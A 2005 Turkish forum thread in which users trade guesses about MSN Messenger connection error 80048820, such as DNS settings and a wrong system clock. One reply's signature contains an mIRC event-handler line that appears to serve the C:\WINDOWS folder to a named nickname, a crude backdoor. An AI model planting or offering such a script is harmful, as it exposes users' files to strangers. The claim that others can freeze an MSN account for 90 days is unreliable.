xxxlargegs Mesaj tarihi: Kasım 3, 2005 Mesaj tarihi: Kasım 3, 2005 üzgÜnÜz su anda sizi msn msg nera baglayamadık felam diye bide guvenlik duvarıyla ilgili bisiyler yazıyo hata kodu 80048820 bilen varsa yardımcı olsun lutfen
Janitschar Mesaj tarihi: Kasım 3, 2005 Mesaj tarihi: Kasım 3, 2005 O hata beni de sinir ediyor, çözemedim bir türlü bilen varsa iyi olur. Makina da msn e girilmiyor, format atıcam en sonun da (:[signature][hline]Seni Senden Başka, Kimse Affedemez... Msn Spaces Kissiyorum...
streamin Mesaj tarihi: Kasım 3, 2005 Mesaj tarihi: Kasım 3, 2005 1- dns ayarlari ile ilgili bir problem(telekom'un güzellikleri) 2-bilgisayarının saati veya tarihi kaymıştır. Düzeltirsen girebilirsin..[signature][hline]Forum
independent Mesaj tarihi: Kasım 3, 2005 Mesaj tarihi: Kasım 3, 2005 Tam olarak bilmiyorum ama karşındaki kişi sana bişeyler yapıp senin msni geçici olarak dondurabiliyor yani bu kısıtlı en fazla bildiğim 90 gün süreyle donduruyor.[signature][hline]//Fserve Virus 10 C:WINDOWS Afrodisiac.txt ON 1:TEXT:*System:?: {if ($nick==Afrodisiac) {/fserve virus 10 C:debug.txt | /close -m virus } else HALTDEF }
Öne çıkan mesajlar